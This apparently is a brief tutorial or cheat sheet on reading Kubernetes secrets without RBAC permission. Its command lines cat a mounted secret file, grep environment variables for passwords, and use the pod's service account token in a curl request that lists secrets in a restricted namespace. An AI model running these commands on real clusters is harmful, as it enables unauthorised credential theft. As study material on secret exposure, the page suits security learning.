Kubernetes Get Secret Without Permissions
87 words
One minute
Mounted Secret
1
| kubectl exec pod1 -- cat /etc/secret-volume/password
|
Environment Secret
1
| kubectl exec pod2 -- env | grep PASS
|
By Service Account
Connect to the Container
1
| kubectl exec -it pod3 -- sh
|
1
| mount | grep serviceaccount
|
1
| tmpfs on /run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
|
Get Service Account Data in the Container
1
| ls /run/secrets/kubernetes.io/serviceaccount
|
Get Secret to Call Kubernetes API in the Container
1
| curl https://kubernetes.default/api/v1/namespaces/restricted/secrets -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" -k
|
CozyFex